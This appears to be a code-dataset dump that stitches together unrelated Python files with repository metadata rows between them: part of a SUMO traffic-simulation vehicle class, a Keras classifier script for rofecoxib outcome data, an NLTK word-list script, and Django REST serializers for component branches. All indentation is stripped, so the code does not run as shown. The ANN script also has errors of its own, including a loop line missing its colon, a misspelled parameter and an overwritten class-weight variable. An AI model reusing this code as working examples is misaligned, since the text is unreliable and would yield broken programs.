if len(edge_dict[this_edge][lane]) > 0:
ids, positions = zip(*edge_dict[this_edge][lane])
ids = list(ids)
positions = list(positions)
index = bisect_left(positions, this_pos)
# if you are at the end or the front of the edge, the lane
# leader is in the edges in front of you
if (lane == this_lane and index < len(positions) - 1) \
or (lane != this_lane and index < len(positions)):
# check if the index does not correspond to the current
# vehicle
if ids[index] == veh_id:
leader[lane] = ids[index + 1]
headway[lane] = (positions[index + 1] - this_pos -
self.get_length(leader[lane]))
else:
leader[lane] = ids[index]
headway[lane] = (positions[index] - this_pos
- self.get_length(leader[lane]))
# you are in the back of the queue, the lane follower is in the
# edges behind you
if index > 0:
follower[lane] = ids[index - 1]
tailway[lane] = (this_pos - positions[index - 1]
- self.get_length(veh_id))
# if lane leader not found, check next edges
if leader[lane] == "":
headway[lane], leader[lane] = self._next_edge_leaders(
veh_id, edge_dict, lane, num_edges)
# if lane follower not found, check previous edges
if follower[lane] == "":
tailway[lane], follower[lane] = self._prev_edge_followers(
veh_id, edge_dict, lane, num_edges)
return headway, tailway, leader, follower
def _next_edge_leaders(self, veh_id, edge_dict, lane, num_edges):
"""Search for leaders in the next edge.
Looks to the edges/junctions in front of the vehicle's current edge
for potential leaders. This is currently done by only looking one
edge/junction forwards.
Returns
-------
headway : float
lane headway for the specified lane
leader : str
lane leader for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
headway = 1000 # env.network.length
leader = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.network.next_edge(edge, lane)) == 0:
break
add_length += self.master_kernel.network.edge_length(edge)
edge, lane = self.master_kernel.network.next_edge(edge, lane)[0]
try:
if len(edge_dict[edge][lane]) > 0:
leader = edge_dict[edge][lane][0][0]
headway = edge_dict[edge][lane][0][1] - pos + add_length \
- self.get_length(leader)
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if leader != "":
break
return headway, leader
def _prev_edge_followers(self, veh_id, edge_dict, lane, num_edges):
"""Search for followers in the previous edge.
Looks to the edges/junctions behind the vehicle's current edge for
potential followers. This is currently done by only looking one
edge/junction backwards.
Returns
-------
tailway : float
lane tailway for the specified lane
follower : str
lane follower for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
tailway = 1000 # env.network.length
follower = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.network.prev_edge(edge, lane)) == 0:
break
edge, lane = self.master_kernel.network.prev_edge(edge, lane)[0]
add_length += self.master_kernel.network.edge_length(edge)
try:
if len(edge_dict[edge][lane]) > 0:
tailway = pos - edge_dict[edge][lane][-1][1] + add_length \
- self.get_length(veh_id)
follower = edge_dict[edge][lane][-1][0]
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if follower != "":
break
return tailway, follower
def apply_acceleration(self, veh_ids, acc, smooth=True):
"""See parent class."""
# to handle the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
acc = [acc]
for i, vid in enumerate(veh_ids):
if acc[i] is not None and vid in self.get_ids():
self.__vehicles[vid]["accel"] = acc[i]
this_vel = self.get_speed(vid)
next_vel = max([this_vel + acc[i] * self.sim_step, 0])
if smooth:
self.kernel_api.vehicle.slowDown(vid, next_vel, 1e-3)
else:
self.kernel_api.vehicle.setSpeed(vid, next_vel)
def apply_lane_change(self, veh_ids, direction):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
direction = [direction]
# if any of the directions are not -1, 0, or 1, raise a ValueError
if any(d not in [-1, 0, 1] for d in direction):
raise ValueError(
"Direction values for lane changes may only be: -1, 0, or 1.")
for i, veh_id in enumerate(veh_ids):
# check for no lane change
if direction[i] == 0:
continue
# compute the target lane, and clip it so vehicle don't try to lane
# change out of range
this_lane = self.get_lane(veh_id)
this_edge = self.get_edge(veh_id)
target_lane = min(
max(this_lane + direction[i], 0),
self.master_kernel.network.num_lanes(this_edge) - 1)
# perform the requested lane action action in TraCI
if target_lane != this_lane:
self.kernel_api.vehicle.changeLane(
veh_id, int(target_lane), self.sim_step)
if veh_id in self.get_rl_ids():
self.prev_last_lc[veh_id] = \
self.__vehicles[veh_id]["last_lc"]
def choose_routes(self, veh_ids, route_choices):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
route_choices = [route_choices]
for i, veh_id in enumerate(veh_ids):
if route_choices[i] is not None:
self.kernel_api.vehicle.setRoute(
vehID=veh_id, edgeList=route_choices[i])
def get_x_by_id(self, veh_id):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_x_by_id(vehID) for vehID in veh_id]
if self.get_edge(veh_id) == '':
# occurs when a vehicle crashes is teleported for some other reason
return 0.
return self.master_kernel.network.get_x(
self.get_edge(veh_id), self.get_position(veh_id))
def update_vehicle_colors(self):
"""See parent class.
The colors of all vehicles are updated as follows:
- red: autonomous (rl) vehicles
- white: unobserved human-driven vehicles
- cyan: observed human-driven vehicles
"""
for veh_id in self.get_rl_ids():
try:
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
# color rl vehicles red
self.set_color(veh_id=veh_id, color=RED)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating rl vehicle colors:', e)
# color vehicles white if not observed and cyan if observed
for veh_id in self.get_human_ids():
try:
color = CYAN if veh_id in self.get_observed_ids() else WHITE
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
for veh_id in self.get_ids():
try:
if 'av' in veh_id:
color = RED
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
# color vehicles by speed if desired
if self._color_by_speed:
max_speed = self.master_kernel.network.max_speed()
speed_ranges = np.linspace(0, max_speed, STEPS)
for veh_id in self.get_ids():
veh_speed = self.get_speed(veh_id)
bin_index = np.digitize(veh_speed, speed_ranges)
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
self.set_color(veh_id=veh_id, color=color_bins[bin_index])
# clear the list of observed vehicles
for veh_id in self.get_observed_ids():
self.remove_observed(veh_id)
def get_color(self, veh_id):
"""See parent class.
This does not pass the last term (i.e. transparency).
"""
r, g, b, t = self.kernel_api.vehicle.getColor(veh_id)
return r, g, b
def set_color(self, veh_id, color):
"""See parent class.
The last term for sumo (transparency) is set to 255.
"""
r, g, b = color
self.kernel_api.vehicle.setColor(
vehID=veh_id, color=(r, g, b, 255))
def add(self, veh_id, type_id, edge, pos, lane, speed):
"""See parent class."""
if veh_id in self.master_kernel.network.rts:
# If the vehicle has its own route, use that route. This is used in
# the case of network templates.
route_id = 'route{}_0'.format(veh_id)
else:
#print("Vehicle {} does not have a route_id. Generating one".format(veh_id)) #RWH
# From the deafultdict when a key is called it creates a list
# This makes for a false negative with a new empty list, making a bug when
# the route is not there. So the following fix in 1102 to 1103 .RWH
if self.master_kernel.network.rts.get(edge) is None:
#print("Edge {} is empty!".format(edge))
#self.master_kernel.network.rts[edge] = [([edge],1)] # Risky. Adding a route on the blind eye.
# The prev does not works, this is after the .cfg file is done and loaded to the sumo sim.
print("Printing the routes keys dict . . .\n", self.master_kernel.network.rts.keys())
raise TraCIException("Edge {} assigned to vehicle {} has no route to it.".format(edge, veh_id))
num_routes = len(self.master_kernel.network.rts[edge])
frac = [val[1] for val in self.master_kernel.network.rts[edge]]
route_id = 'route{}_{}'.format(edge, np.random.choice(
[i for i in range(num_routes)], size=1, p=frac)[0])
self.kernel_api.vehicle.addFull(
veh_id,
route_id,
typeID=str(type_id),
departLane=str(lane),
departPos=str(pos),
departSpeed=str(speed))
def get_max_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_max_speed(vehID, error) for vehID in veh_id]
return self.kernel_api.vehicle.getMaxSpeed(veh_id)
def set_max_speed(self, veh_id, max_speed):
"""See parent class."""
self.kernel_api.vehicle.setMaxSpeed(veh_id, max_speed)
def get_accel(self, veh_id, noise=True, failsafe=True):
"""See parent class."""
metric_name = 'accel'
if noise:
metric_name += '_with_noise'
else:
metric_name += '_no_noise'
if failsafe:
metric_name += '_with_falsafe'
else:
metric_name += '_no_failsafe'
if metric_name not in self.__vehicles[veh_id]:
self.__vehicles[veh_id][metric_name] = None
return self.__vehicles[veh_id][metric_name]
def update_accel(self, veh_id, accel, noise=True, failsafe=True):
"""See parent class."""
metric_name = 'accel'
if noise:
metric_name += '_with_noise'
else:
metric_name += '_no_noise'
if failsafe:
metric_name += '_with_falsafe'
else:
metric_name += '_no_failsafe'
self.__vehicles[veh_id][metric_name] = accel
def get_realized_accel(self, veh_id):
"""See parent class."""
if self.get_distance(veh_id) == 0:
return 0
return (self.get_speed(veh_id) - self.get_previous_speed(veh_id)) / self.sim_step
def get_2d_position(self, veh_id, error=-1001):
"""See parent class."""
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_POSITION, error)
def get_distance(self, veh_id, error=-1001):
"""See parent class."""
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_DISTANCE, error)
def get_road_grade(self, veh_id):
"""See parent class."""
# TODO : Brent
return 0
| 40.391597
| 111
| 0.591894
|
f47ed31c172447188e2065e159e4db7d4c7581fd
| 15,246
|
py
|
Python
|
rofe_ann.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
rofe_ann.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
rofe_ann.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed May 29 14:37:38 2019
@author: 00098223
"""
#Part 1 - Data Preprocessing
##Importing the libraries
#import numpy as np
#import matplotlib.pyplot as plt
#import pandas as pd
#import csv
#from imblearn.combine import SMOTEENN
#import tensorflow as tf
def ann(i, epoch, maxmium, unit1):
#Importing the libraries
import numpy as np
import pandas as pd
import csv
#Part 1 - Data Processing
#Importing the dataset
dataset = pd.read_csv('H:/Juan Lu/Data/Coxib/rofecoxib.csv')
dataset = dataset.drop(["rootnum", "sup_date","match","rofecoxib","outcome","duration",
"death","duration_d","death.1","duration_d.1","duration",
"admission","duration_a","death_old","ACS","stroke.1","day",
"acs_stroke","cvd_death_updated"
], axis=1)
X = dataset.iloc[:,0:29].values
y = dataset.iloc[:,29].values
from sklearn.linear_model import LogisticRegression
from imblearn.under_sampling import (ClusterCentroids, RandomUnderSampler,
TomekLinks,
# NearMiss,
# InstanceHardnessThreshold,
# CondensedNearestNeighbour,
# EditedNearestNeighbours,
# RepeatedEditedNearestNeighbours,
# AllKNN,
# NeighbourhoodCleaningRule,
OneSidedSelection)
sampler = TomekLinks(random_state=42)
#sampler = ClusterCentroids(random_state= 0)#slow
#sampler = RandomUnderSampler(random_state=0)
#sampler = NearMiss(version=1,random_state=0)
#sampler = NearMiss(version=2,random_state=0)
#sampler = NearMiss(version=3,random_state=0)
#sampler = InstanceHardnessThreshold(random_state=0,
# estimator=LogisticRegression())
#sampler = CondensedNearestNeighbour(random_state=0)#slow
#sampler = OneSidedSelection(random_state=0)
#sampler = NeighbourhoodCleaningRule(random_state=0)
#sampler = EditedNearestNeighbours(random_state=0)
##sampler = RepeatedEditedNearestNeighbours(random_state=0)
#sampler = AllKNN(random_state=0, allow_minority=True)
#X_resample, y_resample = sampler.fit_sample(X, y)
#Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
#X_train, X_test, y_train, y_test = train_test_split(X_resample, y_resample, test_size = 0.2, random_state = 42)
# ran = i
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 42 + 0)
X_train, y_train = sampler.fit_sample(X_train, y_train)
#Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
#Part 2 - ANN
#Importing the Keras libraries and packages
import keras
from keras.models import Sequential
from keras.layers import Dense
#Initialising the ANN
classifier = Sequential()
#Adding the input layer and the first hidden layer 2250
classifier.add(Dense(input_dim = 29,units= unit1, kernel_initializer = "uniform", activation= "relu"))
#Adding the second hidden layer 825
classifier.add(Dense(units = 825, kernel_initializer = "uniform", activation= "relu"))
#Adding the third hidden layer 18
classifier.add(Dense(units = 18, kernel_initializer = "uniform", activation= "relu"))#17
# #Adding the third hidden layer
# classifier.add(Dense(units = 18, kernel_initializer = "uniform", activation= "relu"))
#Adding the output layer
classifier.add(Dense(units = 1, kernel_initializer = "uniform", activation= "sigmoid"))
#
#
# import keras.backend as K
#
# def get_my_loss():
#
# def weighted_loss(y_true, y_pred):
# TP = K.sum(y_true * y_pred,axis = -1)
# FP = K.sum((1.- y_true)*y_pred,axis=-1)
# TN = K.sum((1.-y_true)*(1-y_pred),axis=-1)
# TP_2 = K.mean(K.sum((y_true - 1.) + y_pred, axis=-1))
# #P = K.sum(y_true)
# #F = K.sum(1. - y_true)
# FN = K.sum(y_true * (y_true - y_pred),axis= -1)
# FN_2 = K.mean(K.sum((1. - y_true)* (y_true - y_pred),axis=-1))
# return ( 0.26* FP - 12 * TP + 0.1 + 1.3 * K.mean(K.sum((1. - y_true)* (y_pred - y_true),axis=-1))) + FN + 0.35 * FN_2 - 0.05 * TN
# #return ( 0.076 * FP - 13 * TP + 0.10 + 1.61 * FN_2 + 2.81 * K.mean(K.sum((1. - y_true)* (y_pred - y_true),axis=-1))) - 0.05 * TN + 0.2 * FN
#
# return weighted_loss
# import keras.backend as K
# def pos_pre(y_true, y_pred):
# TP = K.sum(y_true * y_pred,axis = -1)
# FP = K.sum((1.- y_true)*y_pred,axis=-1)
# TN = K.sum((1.-y_true)*(1-y_pred),axis=-1)
# TP_2 = K.mean(K.sum((y_true - 1.) + y_pred, axis=-1))
# FN = K.sum(y_true * (y_true - y_pred),axis= -1)
# FN_2 = K.mean(K.sum((1. - y_true)* (y_true - y_pred),axis=-1))
#
# return 5*TP - FP + TN + TP_2 - FN - FN_2
#
# err_II = y_true - pred
# #FN = tf.count_nonzero(FN)
# FN = tf.greater(err_II,0)
# FN = K.cast(FN,tf.float32)
# FN = tf.count_nonzero(FN)
# FN = K.cast(FN,tf.float32)
#
#
# err_I = pred - y_true
#
# #FP = tf.greater(err_I,0.3)
#
# FP = tf.greater(err_I,0)
# FP = K.cast(FP,tf.float32)
# FP = tf.count_nonzero(FN)
# FP = K.cast(FP,tf.float32)
#
# P = tf.count_nonzero(y_true)
# P = tf.maximum(P,1)
# P = tf.cast(P,tf.float32)
# print(P)
#
# M = tf.size(y_true)
# M = tf.cast(M,tf.float32)
# N = M - P
# print(N)
# N = tf.cast(N,tf.float32)
# fal_pos = FP/P
#TP = tf.metrics.true_negatives(y_true,y_pred)
# return 1 - 1.2*FN/(N+FN)
from keras import optimizers
from keras.models import model_from_yaml
opt = optimizers.Adam(lr= 0.001, beta_1=0.9, beta_2=0.999, epsilon=None,decay=0.0,amsgrad=False)
# # load YAML and create model
# yaml_file = open('model.yaml', 'r')
# loaded_model_yaml = yaml_file.read()
# yaml_file.close()
# loaded_model = model_from_yaml(loaded_model_yaml)
# # load weights into new model
# loaded_model.load_weights("model.h5")
# print("Loaded model from disk")
#Compiling the ANNivo
classifier.compile(optimizer = opt, loss = 'binary_crossentropy', metrics = ['binary_accuracy'])
# loaded_model.compile(optimizer = opt, loss = 'binary_crossentropy', metrics = ['binary_accuracy'])
# classifier.compile(optimizer = opt, loss = get_my_loss(), metrics = ['accuracy'])
#Fitting the ANN to the Training set
#clf = make_pipeline(sampler,classifier)
#clf.fit(X_train, y_train)
#sample weight
#sample_weight = np.ones((36288,))*0.5 + y_train*0.3#{0:1.,1:3.5}
from sklearn.utils import class_weight
sample_weight = class_weight.compute_sample_weight('balanced', y_train)
#sample_weight = np.sqrt(sample_weight) 5
sample_weight = sample_weight**(i/2)
from sklearn.utils import class_weight
#1.4
class_weight = class_weight.compute_class_weight('balanced', np.unique(y_train),y_train)
class_weight = sample_weight**(100/2)
# class_weight = {0:0.,
# 1:0}
#class_weight = {0: 1.,
# 1: 19.3}
#history = classifier.fit(X_train, y_train, batch_size=1400, epochs=15, validation_split=0.1, class_weight= class_weight)
history = classifier.fit(X_train, y_train, batch_size=epoch, epochs=10, validation_split=0.1, sample_weight = sample_weight) # 5600 10 class_weight= class_weight,
# history = loaded_model.fit(X_train, y_train, batch_size=6000, epochs=10, validation_split=0.1, class_weight= class_weight, sample_weight = sample_weight)
'''
#Part 3 - Making the predictions and evaluating the model
#Predicting the Test
thre = 0.01
y_pred = classifier.predict(X_test)
y_pred = (y_pred > thre)
#Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
from sklearn.metrics import roc_auc_score
auc = roc_auc_score(y_test, y_pred)
print('Roc auc score: ' + str(auc))
from sklearn.metrics import precision_recall_curve
precision, recall, _ = precision_recall_curve(y_test, y_pred)
from sklearn.metrics import classification_report
report = classification_report(y_test, y_pred)
print(report)
dataset_c = pd.read_csv('H:\\Juan Lu\\Data\\Coxib\\temp\\cele_only.csv')
y_c = dataset_c.iloc[:,36].values
X_c = dataset_c.iloc[:,2:36].values
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X_c, y_c, test_size = 0.8, random_state = 42)
X_train, y_train = sampler.fit_sample(X_train, y_train)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
history = classifier.fit(X_train, y_train, batch_size=1400, epochs=15, validation_split=0.1, class_weight= class_weight)
dataset_i = pd.read_csv('H:\\Juan Lu\\Data\\Coxib\\temp\\ibup_only.csv')
X_i = dataset_i.iloc[:,2:36].values
y_i = dataset_i.iloc[:,36].values
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X_i, y_i, test_size = 0.8, random_state = 42)
X_train, y_train = sampler.fit_sample(X_train, y_train)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
history = classifier.fit(X_train, y_train, batch_size=1400, epochs=3, validation_split=0.1, class_weight= class_weight)
#file = open("data summary.txt", "a")
#file.write('Roc auc score: ' + str(auc) +"\n" + 'threshold: '+str(thre)+ "\n")
#file.write(report + "\n")
#file.write('50,26,17,class_weight,1 - (FN + FP)/M ' + "\n")
#file.close()
score = 0
score_max = 0
thres = 0
f1 = 0
f1_max = 0
auc_max = 0
from sklearn.metrics import f1_score
from sklearn.metrics import classification_report
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import roc_auc_score
threshold = 0.0
precision_list = []
recall_list = []
for i in range (1,99):
threshold = i/100
y_pred = classifier.predict(X_test)
y_pred = (y_pred > threshold)
auc = roc_auc_score(y_test, y_pred)
#print('Roc auc score: ' + str(auc))
precision, recall, _ = precision_recall_curve(y_test, y_pred)
score = precision[1] + recall[1]
f1 = f1_score(y_test, y_pred)
#print(str(threshold) + "," + str(f1))
#print(score)
if f1 > f1_max:
f1_max = f1
thres = threshold
#score_max = score
print('f1 score max: ' + str(f1_max))
print('thres: ' + str(thres))
print('precision + recall: ' + str(score))
print('Roc auc score: ' + str(auc))
if score > score_max:
thres = threshold
score_max = score
print('f1 score: ' + str(f1))
print('thres: ' + str(thres))
print('precision + recall max : ' + str(score_max))
print('Roc auc score: ' + str(auc))
if auc > auc_max:
auc_max = auc
thres = threshold
#score_max = score
print('f1 score: ' + str(f1_max))
print('thres: ' + str(thres))
print('precision + recall: ' + str(score_max))
print('Roc auc score max: ' + str(auc_max))
#'''
y_pred = classifier.predict(X_test)
# y_pred = loaded_model.predict(X_test)
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve, auc
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(2):
fpr[i], tpr[i], _ = roc_curve(y_test, y_pred)
roc_auc[i] = auc(fpr[i], tpr[i])
# if roc_auc_score(y_test, y_pred) > maximum:
# # serialize model to YAML
# model_yaml = classifier.to_yaml()
# with open("model.yaml", "w") as yaml_file:
# yaml_file.write(model_yaml)
# # serialize weights to HDF5
# classifier.save_weights("model.h5")
# print("Saved model to disk")
print(roc_auc_score(y_test, y_pred))
total = []
total.append(roc_auc_score(y_test, y_pred))
total.append(epoch)
total.append(i)
with open('H:/Juan Lu/Data/Coxib/test_result.csv','a') as csvoutput:
writer = csv.writer(csvoutput, lineterminator='\n')
writer.writerows(total)
csvoutput.close()
return roc_auc_score(y_test, y_pred)
score = [0]
#
for unit1 in range(57, 2250, 100)
for epoch in range(500, 3000, 500):
for i in range(1,10):
maximum = max(score)
score.append(ann(i,epoch,maximum,unit1))
#
#plt.figure()
#lw = 1
#plt.plot(fpr[1], tpr[1], color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[1])
#plt.plot([0, 1], [0, 1], color='navy', linestyle='--')
#plt.xlim([0.0, 1.0])
#plt.ylim([0.0, 1.05])
#plt.xlabel('False Positive Rate')
#plt.ylabel('True Positive Rate')
#plt.title('Receiver operating characteristic')
#plt.legend(loc="lower right")
#plt.show()
#
#
# summarize history for accuracy
#plt.plot(history.history['binary_accuracy'])
#plt.plot(history.history['val_binary_accuracy'])
#plt.title('model accuracy')
#plt.ylabel('accuracy')
#plt.xlabel('epoch')
#plt.legend(['train', 'test'], loc='upper left')
#plt.show()
#
## summarize history for loss
#plt.plot(history.history['loss'])
#plt.plot(history.history['val_loss'])
#plt.title('model loss')
#plt.ylabel('loss')
#plt.xlabel('epoch')
#plt.legend(['train', 'test'], loc='upper left')
#plt.show()
| 37.185366
| 168
| 0.579037
|
c69725e309105e48bd6f1ed1d7a844fa2d8d92b7
| 2,299
|
py
|
Python
|
python/get_words.py
|
Eibriel/TokenMenu
|
45890dd9fbf60670870a35aa73d8ac28789013db
|
[
"Apache-2.0"
] | null | null | null |
python/get_words.py
|
Eibriel/TokenMenu
|
45890dd9fbf60670870a35aa73d8ac28789013db
|
[
"Apache-2.0"
] | null | null | null |
python/get_words.py
|
Eibriel/TokenMenu
|
45890dd9fbf60670870a35aa73d8ac28789013db
|
[
"Apache-2.0"
] | null | null | null |
import csv
import json
from nltk.corpus import stopwords
from nltk import download
download('stopwords') # Download stopwords list.
stop_words = stopwords.words('english')
words = []
sentences = []
def preprocess(sentence):
if False:
sentence = sentence.replace("?", "")
sentence = sentence.replace("!", "")
sentence = sentence.replace(",", "")
sentence = sentence.replace(".", "")
sentence = sentence.replace("\"", "")
sentence = sentence.replace("-", "")
sentence = sentence.replace("'", " ")
return [w for w in sentence.lower().split() if w not in stop_words]
return sentence.lower().split()
if False:
with open('simpsons_dataset.csv', 'r', encoding='utf-8') as file:
reader = csv.reader(file)
else:
reader = [
["", "who are you ?"],
["", "where are you from ?"],
["", "my name is anna"],
["", "what time is it ?"],
["", "hi how are you doing ?"],
["", "im fine how about yourself ?"],
["", "im pretty good thanks for asking"],
["", "no problem so how have you been ?"],
["", "ive been great what about you ?"],
["", "ive been good im in school right now"],
["", "what school do you go to ?"],
["", "i go to pcc"],
["", "do you like it there ?"],
["", "its okay its a really big campus"],
["", "good luck with school"],
["", "thank you very much"],
["", "im doing well how about you ?"],
["", "never better thanks"],
["", "it looks like it may rain soon"],
["", "yes and i hope that it does"],
["", "why is that ?"],
["", "i really love how rain clears the air"],
["", "me too it always smells so fresh after it rains"],
["", "yes but i love the night air after it rains"],
["", "really ? why is it ?"],
["", "because you can see the stars perfectly"],
]
for row in reader:
s = preprocess(row[1])
if len(s) > 3:
sentences.append([row[1], s])
words += s
words = list(set(words))
with open("words.json", 'w') as fp:
json.dump(words, fp, sort_keys=True, indent=4)
with open("sentences.json", 'w') as fp:
json.dump(sentences, fp, sort_keys=True, indent=4)
| 31.493151
| 75
| 0.53632
|
3fa795e1521fcc68f0a6f508c6ea922ed0b620fd
| 11,180
|
py
|
Python
|
pdc/apps/componentbranch/serializers.py
|
hluk/product-definition-center
|
af79f73c30fa5f5709ba03d584b7a49b83166b81
|
[
"MIT"
] | 18
|
2015-12-15T17:56:18.000Z
|
2021-04-10T13:49:48.000Z
|
pdc/apps/componentbranch/serializers.py
|
hluk/product-definition-center
|
af79f73c30fa5f5709ba03d584b7a49b83166b81
|
[
"MIT"
] | 303
|
2015-11-18T07:37:06.000Z
|
2021-05-26T12:34:01.000Z
|
pdc/apps/componentbranch/serializers.py
|
hluk/product-definition-center
|
af79f73c30fa5f5709ba03d584b7a49b83166b81
|
[
"MIT"
] | 27
|
2015-11-19T20:33:54.000Z
|
2021-03-25T08:15:28.000Z
|
#
# Copyright (c) 2017 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
from rest_framework import serializers
from django.conf import settings as django_settings
import re
from datetime import datetime
import six
from pdc.apps.common.fields import ChoiceSlugField
from pdc.apps.component.models import ReleaseComponentType, GlobalComponent
from pdc.apps.componentbranch.models import (
ComponentBranch, SLA, SLAToComponentBranch)
from pdc.apps.common.serializers import StrictSerializerMixin
def is_branch_active(branch):
"""
Checks to see if the branch is active by seeing if there are valid SLAs
tied to the branch
:param branch: a ComponentBranch object
:return: a boolean
"""
slas = branch.slas.all()
today = datetime.utcnow().date()
for sla in slas:
if sla.eol >= today:
# If the branch has at least one SLA that hasn't gone EOL, it is
# still active
return True
return False
class BranchNameField(serializers.Field):
"""
A serializer field that verifies the branch's name matches policy
"""
doc_format = "string"
@staticmethod
def bad_branch_name(branch_name):
"""
Determines if the branch name collides with the defined regex blacklist
:param branch_name: string representing the branch name
:return: boolean
"""
return django_settings.COMPONENT_BRANCH_NAME_BLACKLIST_REGEX and \
re.match(django_settings.COMPONENT_BRANCH_NAME_BLACKLIST_REGEX,
branch_name)
def to_representation(self, obj):
"""
Serializes the internal value
:param obj: string representing the branch name
:return: string representing the branch name
"""
return obj
def to_internal_value(self, data):
"""
Takes the supplied value and ensures it conforms to branch name
standards such as having a max length of 300 and conforming to the
configured regex.
:param data: the object representing the branch name
:return: the validated branch name
"""
if not isinstance(data, six.text_type):
msg = ('A string was not supplied. The type was "{0}".'
.format(type(data).__name__))
raise serializers.ValidationError(msg)
if len(data) > 300:
raise serializers.ValidationError(
'The string must be less than 300 characters')
if self.bad_branch_name(data):
raise serializers.ValidationError(
'The branch name is not allowed based on the regex "{0}"'
.format(django_settings.COMPONENT_BRANCH_NAME_BLACKLIST_REGEX))
return data
class SLASerializer(StrictSerializerMixin,
serializers.ModelSerializer):
"""
Serializer for the SLA model
"""
class Meta:
model = SLA
fields = ('id', 'name', 'description')
def update(self, instance, validated_data):
"""
Override the update function to not allow a user to modify the SLA name
"""
if 'name' in validated_data and instance.name != validated_data['name']:
error_msg = 'You may not modify the SLA\'s name due to policy'
raise serializers.ValidationError({'name': [error_msg]})
return super(SLASerializer, self).update(instance, validated_data)
class SLAToComponentBranchSerializerForComponentBranch(
serializers.ModelSerializer):
"""
A serializer for the SLAToComponentBranch model to be used in the
ComponentBranch serializer
"""
sla = ChoiceSlugField(slug_field='name', read_only=True)
eol = serializers.DateField(read_only=True)
class Meta:
model = SLAToComponentBranch
fields = ('id', 'sla', 'eol')
class ComponentBranchSerializer(StrictSerializerMixin,
serializers.ModelSerializer):
"""
A serializer for the ComponentBranch model
"""
name = BranchNameField()
global_component = serializers.SlugRelatedField(
slug_field='name', queryset=GlobalComponent.objects.all())
type = ChoiceSlugField(
slug_field='name', queryset=ReleaseComponentType.objects.all())
critical_path = serializers.BooleanField(default=False)
slas = SLAToComponentBranchSerializerForComponentBranch(
many=True, read_only=True)
active = serializers.SerializerMethodField('is_active')
def is_active(self, branch):
"""
Calls the is_branch_active function to determine if the branch is still
active
:param branch: a ComponentBranch object
:return: a boolean
"""
return is_branch_active(branch)
class Meta:
model = ComponentBranch
fields = ('id', 'global_component', 'name', 'slas', 'type', 'active',
'critical_path')
def update(self, instance, validated_data):
"""
Override the update function to not allow a user to modify the branch
name
"""
if 'name' in validated_data and instance.name != validated_data['name']:
raise serializers.ValidationError({
'name': ['You may not modify the branch\'s name due to policy']
})
return super(ComponentBranchSerializer, self).update(
instance, validated_data)
class ComponentBranchSerializerWithoutSLA(serializers.Serializer):
"""
A serializer for the ComponentBranch model to be used in the
SLAToComponentBranch serializer
"""
id = serializers.IntegerField(read_only=True)
name = BranchNameField()
global_component = serializers.SlugRelatedField(
slug_field='name', queryset=GlobalComponent.objects.all())
type = ChoiceSlugField(
slug_field='name', queryset=ReleaseComponentType.objects.all())
critical_path = serializers.BooleanField(required=False)
active = serializers.SerializerMethodField('is_active')
def is_active(self, branch):
"""
Calls the is_branch_active function to determine if the branch is still
active
:param branch: a ComponentBranch object
:return: a boolean
"""
return is_branch_active(branch)
class SLAToComponentBranchSerializer(StrictSerializerMixin,
serializers.Serializer):
"""
A serializer for the SLAToComponentBranch model that allows branch creation
"""
id = serializers.IntegerField(read_only=True)
sla = ChoiceSlugField(slug_field='name', queryset=SLA.objects.all())
branch = ComponentBranchSerializerWithoutSLA()
